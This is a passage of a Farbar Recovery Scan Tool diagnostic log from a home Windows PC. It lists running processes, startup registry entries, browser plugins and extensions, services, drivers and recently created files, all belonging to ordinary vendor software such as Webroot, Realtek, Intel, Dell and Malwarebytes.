(Webroot) C:\Program Files\Webroot\WRSA.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Webroot) C:\Program Files\Webroot\WRSA.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Atheros) C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler64.exe
(Qualcomm®Atheros®) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe
(Cisco) C:\Users\John\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(Creative Technology Ltd) C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
() C:\Users\John\AppData\Local\DIRECTV Player\NDSPCShowServer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7202520 2013-08-19] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-07] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-07] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2774256 2013-08-12] (Synaptics Incorporated)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5774664 2013-09-10] (Dell Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-15] (Intel Corporation)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [562264 2014-07-17] (Waves Audio Ltd.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [673616 2009-04-07] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)
HKLM-x32\...\Run: [WRSVC] => C:\Program Files\Webroot\WRSA.exe [771240 2015-01-09] (Webroot)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe [132736 2013-07-02] ( (Qualcomm®Atheros®))
HKU\S-1-5-21-1973512931-3336358897-1288466322-1001\...\Run: [PCShowServer] => C:\Users\John\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe [1631088 2014-09-16] (Cisco)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install Webroot FF RunOnce.lnk
ShortcutTarget: Install Webroot FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\wruninstall.exe (Webroot Software, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install Webroot IE RunOnce.lnk
ShortcutTarget: Install Webroot IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\wruninstall.exe (Webroot Software, Inc.)
ShellIconOverlayIdentifiers: [ ] -> {1914B27A-33C8-46F8-A1C2-F993268D4564} => C:\Windows\system32\WRusr.dll (Webroot)
ShellIconOverlayIdentifiers: [  ] -> {C14874EA-ACE4-4A47-8A81-18C4D1C40868} => C:\Windows\system32\WRusr.dll (Webroot)
ShellIconOverlayIdentifiers: [   ] -> {6DA1ED92-315E-4D0B-B354-9D5F519DBA95} => C:\Windows\system32\WRusr.dll (Webroot)
ShellIconOverlayIdentifiers: [    ] -> {8D7FC74C-E409-42DF-8EEE-69D45FAE2F30} => C:\Windows\system32\WRusr.dll (Webroot)
ShellIconOverlayIdentifiers: [DBARFileBackuped] -> {831cebdd-6baf-4432-be76-9e0989c14aef} => C:\Windows\system32\mscoree.dll (Microsoft Corporation)
ShellIconOverlayIdentifiers: [DBARFileNotBackuped] -> {275e4fd7-21ef-45cf-a836-832e5d2cc1b3} => C:\Windows\system32\mscoree.dll (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1973512931-3336358897-1288466322-1001\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wundergro...w:55304.2.99999
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> DefaultScope {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {843F8246-B4D3-436E-993C-E683694E7048} URL =
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1973512931-3336358897-1288466322-1001 -> {E3480582-FBAB-47BD-B586-87BA7FDCE2BD} URL = http://search.yahoo....p={searchTerms}
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm®Atheros®)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Webroot Vault -> {c8d5d964-2be8-4c5b-8cf5-6e975aa88504} -> C:\ProgramData\WRData\pkg\LPBar64.dll (Webroot)
BHO: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files\Webroot\WRData\PKG\Vistax64\wrflt.dll (Webroot)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Webroot Vault -> {c8d5d964-2be8-4c5b-8cf5-6e975aa88504} -> C:\ProgramData\WRData\pkg\LPBar.dll (Webroot)
BHO-x32: Webroot Filtering Extension -> {C9C42510-9B41-42c1-9DCD-7282A2D07C61} -> C:\Program Files\Webroot\WRData\PKG\Vistax86\wrflt.dll (Webroot)
Toolbar: HKLM - Webroot Toolbar - {97ab88ef-346b-4179-a0b1-7445896547a5} - C:\ProgramData\WRData\pkg\LPBar64.dll (Webroot)
Toolbar: HKLM-x32 - Webroot Toolbar - {97ab88ef-346b-4179-a0b1-7445896547a5} - C:\ProgramData\WRData\pkg\LPBar.dll (Webroot)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420
FF DefaultSearchEngine: Google
FF Homepage: hxxp://www.wunderground.com/cgi-bin/findweather/getForecast?query=zmw:55304.2.99999
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1973512931-3336358897-1288466322-1001: @nds.com/PlayerPlugin -> C:\Users\John\AppData\Local\DIRECTV Player\npPlayerPlugin.dll (Cisco)
FF Plugin HKU\S-1-5-21-1973512931-3336358897-1288466322-1001: @nds.com/PlayerPlugin64 -> C:\Users\John\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll (Cisco)
FF Plugin HKU\S-1-5-21-1973512931-3336358897-1288466322-1001: NDS.com/PlayerPlugin -> C:\Users\John\AppData\Local\DIRECTV Player\npPlayerPlugin.dll (Cisco)
FF Extension: Xmarks - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\[email protected] [2014-11-23]
FF Extension: Webroot Password Manager - C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\Extensions\{8ac62a8b-8b3f-43ba-9b1a-90c299b9dfda} [2015-01-09]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer
FF Extension: Webroot Filtering Extension - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer [2015-01-09]

Chrome:
=======
CHR Profile: C:\Users\John\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-05]
CHR Extension: (Free Visio Viewer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcpmofnlkemfkhgngcdppgbhncoflmpe [2014-12-16]
CHR Extension: (Google Wallet) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-04]
CHR HKLM-x32\...\Chrome\Extension: [okfhiodnpcnnnpgbjbhfebjnbagmfhab] - C:\ProgramData\WRData\pkg\lpchrome.crx [2015-01-09]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [312448 2013-07-02] (Windows ® Win 7 DDK provider)
R2 EpsonBidirectionalService; C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSVC.exe [94208 2006-12-19] (SEIKO EPSON CORPORATION) [File not signed]
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [14696 2013-07-15] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; c:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; c:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-06-01] (Intel Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [246488 2013-06-18] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [1915480 2013-05-23] (SoftThinks SAS)
R2 WRSVC; C:\Program Files\Webroot\WRSA.exe [771240 2015-01-09] (Webroot)
R2 ZAtheros Wlan Agent; C:\Program Files (x86)\Dell Wireless\Ath_WlanAgent.exe [81536 2013-06-21] (Atheros)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 BTATH_LWFLT; C:\Windows\System32\DRIVERS\btath_lwflt.sys [77464 2013-07-02] (Qualcomm Atheros)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2013-07-11] (Intel Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2015-01-03] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [118272 2014-12-26] (Intel Corporation)
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [30448 2013-08-12] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-12] (Synaptics Incorporated)
R0 WRkrn; C:\Windows\System32\drivers\WRkrn.sys [114176 2015-01-09] (Webroot)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-09 16:25 - 2015-01-09 16:25 - 00000000 ___RD () C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2015-01-09 16:09 - 2015-01-09 16:25 - 00000000 ____D () C:\Users\John\AppData\Local\lptmp1138209518
2015-01-09 16:08 - 2015-01-09 16:24 - 00000749 _____ () C:\Users\Public\Desktop\Webroot SecureAnywhere.lnk
2015-01-09 16:08 - 2015-01-09 16:24 - 00000000 ____D () C:\ProgramData\WRData
2015-01-09 16:08 - 2015-01-09 16:08 - 00153256 _____ (Webroot) C:\Windows\SysWOW64\WRusr.dll
2015-01-09 16:08 - 2015-01-09 16:08 - 00114176 _____ (Webroot) C:\Windows\system32\Drivers\WRkrn.sys
2015-01-09 16:08 - 2015-01-09 16:08 - 00103816 _____ (Webroot) C:\Windows\system32\WRusr.dll
2015-01-09 16:08 - 2015-01-09 16:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Webroot SecureAnywhere
2015-01-09 16:08 - 2015-01-09 16:08 - 00000000 ____D () C:\Program Files\Webroot
2015-01-08 23:32 - 2015-01-08 23:32 - 00000000 ____D () C:\Users\John\Desktop\FRST-OlderVersion
2015-01-07 12:38 - 2015-01-07 12:38 - 731618252 _____ () C:\Windows\MEMORY.DMP
2015-01-07 12:38 - 2015-01-07 12:38 - 00282232 _____ () C:\Windows\Minidump\010715-51043-01.dmp
2015-01-07 10:42 - 2015-01-07 10:42 - 13087456 _____ (Microsoft Corporation) C:\Users\John\Desktop\Silverlight_x64.exe
2015-01-06 09:53 - 2015-01-06 09:53 - 00000226 _____ () C:\Users\John\Desktop\Geeks to Go - Free help from tech experts.URL
2015-01-05 13:19 - 2015-01-05 13:19 - 00000127 _____ () C:\Users\John\Desktop\ckfiles.txt
2015-01-05 13:17 - 2015-01-05 13:17 - 00468480 _____ () C:\Users\John\Desktop\CKScanner.exe
2015-01-05 13:14 - 2015-01-09 16:28 - 00016302 _____ () C:\Users\John\Desktop\FRST.txt
2015-01-05 13:14 - 2015-01-09 16:16 - 00023117 _____ () C:\Users\John\Desktop\Addition.txt
2015-01-05 13:12 - 2015-01-08 23:32 - 02124288 _____ (Farbar) C:\Users\John\Desktop\FRST64.exe
2015-01-05 10:47 - 2015-01-09 16:24 - 00000392 _____ () C:\Windows\setupact.log
2015-01-05 10:47 - 2015-01-05 10:47 - 00000000 _____ () C:\Windows\setuperr.log
2015-01-05 10:46 - 2015-01-08 23:20 - 00010480 _____ () C:\Windows\PFRO.log
2015-01-04 22:49 - 2015-01-04 22:49 - 00000031 _____ () C:\Users\John\Documents\direct.txt
2014-12-29 17:34 - 2014-12-29 17:34 - 00001165 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-12-29 17:34 - 2014-12-29 17:34 - 00001153 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-12-29 17:34 - 2014-12-29 17:34 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-12-29 17:34 - 2014-12-29 17:34 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-12-28 13:51 - 2014-12-28 13:51 - 00000000 __SHD () C:\Users\John\AppData\Local\EmieUserList
2014-12-28 13:51 - 2014-12-28 13:51 - 00000000 __SHD () C:\Users\John\AppData\Local\EmieSiteList
2014-12-28 13:51 - 2014-12-28 13:51 - 00000000 __SHD () C:\Users\John\AppData\Local\EmieBrowserModeList
2014-12-28 13:37 - 2014-12-28 13:39 - 58082952 _____ (Microsoft Corporation) C:\Users\John\Desktop\Explorer.EXE
2014-12-28 13:36 - 2014-12-28 13:36 - 00001419 _____ () C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-12-26 23:13 - 2014-12-28 13:46 - 00000000 ___HD () C:\Windows\msdownld.tmp
2014-12-26 14:28 - 2015-01-09 16:27 - 00000000 ____D () C:\FRST
2014-12-26 10:59 - 2014-12-26 10:59 - 09890008 _____ (Realtek Semiconductor Corp.) C:\Windows\SysWOW64\RsCRIcon.dll
2014-12-26 10:59 - 2014-12-26 10:59 - 00941784 _____ (Realtek ) C:\Windows\system32\Drivers\Rt64win7.sys
2014-12-26 10:59 - 2014-12-26 10:59 - 00331992 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RtsUVStor.sys
2014-12-26 10:59 - 2014-12-26 10:59 - 00073800 _____ (Realtek Semiconductor Corporation) C:\Windows\system32\RtNicProp64.dll
2014-12-26 10:58 - 2014-12-26 10:58 - 00118272 _____ (Intel Corporation) C:\Windows\system32\Drivers\TeeDriverx64.sys
2014-12-24 17:50 - 2014-12-24 17:50 - 00000263 _____ () C:\Users\John\Desktop\Dropbox - Natalie.URL
2014-12-19 13:10 - 2014-12-26 19:17 - 00000000 ____D () C:\Users\John\AppData\Roaming\Octoshape
2014-12-19 13:10 - 2014-12-19 13:10 - 00000000 ____D () C:\Users\John\AppData\Local\DIRECTV Player
2014-12-19 13:09 - 2014-12-19 13:09 - 20367968 _____ (DIRECTV) C:\Users\John\Downloads\DIRECTV_Player_11.0.exe
2014-12-17 19:57 - 2015-01-03 17:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-17 19:57 - 2014-12-17 19:57 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-17 19:57 - 2014-12-17 19:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-17 19:57 - 2014-12-17 19:57 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-17 19:57 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-17 19:57 - 2014-11-21 06:14 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-17 19:57 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-12-17 19:56 - 2014-12-17 19:56 - 20447072 _____ (Malwarebytes Corporation ) C:\Users\John\Downloads\mbam-setup-2.0.4.1028.exe
2014-12-17 12:05 - 2014-12-12 23:09 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-12-17 12:05 - 2014-12-12 21:33 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-12-16 15:48 - 2014-12-16 15:48 - 00000000 ____D () C:\Users\John\AppData\Local\Skype
2014-12-16 15:43 - 2014-12-16 15:45 - 44840544 _____ (Skype Technologies S.A.) C:\Users\John\Downloads\SkypeSetupFull.exe
2014-12-16 11:54 - 2014-12-16 11:54 - 02978677 _____ (Vimm's Lair - vimm.net) C:\Users\John\Downloads\FCEUX_2.2.2.exe
2014-12-16 11:51 - 2014-12-16 11:51 - 00455842 _____ (Vimm's Lair - vimm.net) C:\Users\John\Downloads\Jnes_1.1.1.exe
2014-12-16 11:48 - 2014-12-16 11:48 - 01201037 _____ (Vimm's Lair - vimm.net) C:\Users\John\Downloads\RockNES_5.13d.exe
2014-12-14 03:23 - 2014-12-14 03:23 - 00000000 ____D () C:\Program Files (x86)\Dell Digital Delivery
2014-12-11 03:02 - 2014-10-17 20:05 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-12-11 03:02 - 2014-10-17 19:33 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-12-10 11:28 - 2014-11-26 19:43 - 00389296 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-12-10 11:28 - 2014-11-26 19:10 - 00342200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-12-10 11:28 - 2014-11-21 21:13 - 25059840 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-12-10 11:28 - 2014-11-21 21:06 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-12-10 11:28 - 2014-11-21 21:06 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-12-10 11:28 - 2014-11-21 20:50 - 00580096 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-12-10 11:28 - 2014-11-21 20:50 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-12-10 11:28 - 2014-11-21 20:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-12-10 11:28 - 2014-11-21 20:49 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-12-10 11:28 - 2014-11-21 20:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-12-10 11:28 - 2014-11-21 20:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-12-10 11:28 - 2014-11-21 20:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-12-10 11:28 - 2014-11-21 20:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-12-10 11:28 - 2014-11-21 20:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-12-10 11:28 - 2014-11-21 20:34 - 06039552 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-12-10 11:28 - 2014-11-21 20:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-12-10 11:28 - 2014-11-21 20:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-12-10 11:28 - 2014-11-21 20:22 - 19749376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-12-10 11:28 - 2014-11-21 20:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-12-10 11:28 - 2014-11-21 20:20 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-12-10 11:28 - 2014-11-21 20:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-12-10 11:28 - 2014-11-21 20:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-12-10 11:28 - 2014-11-21 20:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-12-10 11:28 - 2014-11-21 20:07 - 00501248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-12-10 11:28 - 2014-11-21 20:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-12-10 11:28 - 2014-11-21 20:06 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-12-10 11:28 - 2014-11-21 20:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-12-10 11:28 - 2014-11-21 20:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-12-10 11:28 - 2014-11-21 20:01 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-12-10 11:28 - 2014-11-21 19:59 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-12-10 11:28 - 2014-11-21 19:58 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-12-10 11:28 - 2014-11-21 19:56 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-12-10 11:28 - 2014-11-21 19:54 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-12-10 11:28 - 2014-11-21 19:49 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-12-10 11:28 - 2014-11-21 19:49 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-12-10 11:28 - 2014-11-21 19:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-12-10 11:28 - 2014-11-21 19:46 - 02125312 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-12-10 11:28 - 2014-11-21 19:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-12-10 11:28 - 2014-11-21 19:43 - 14412800 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
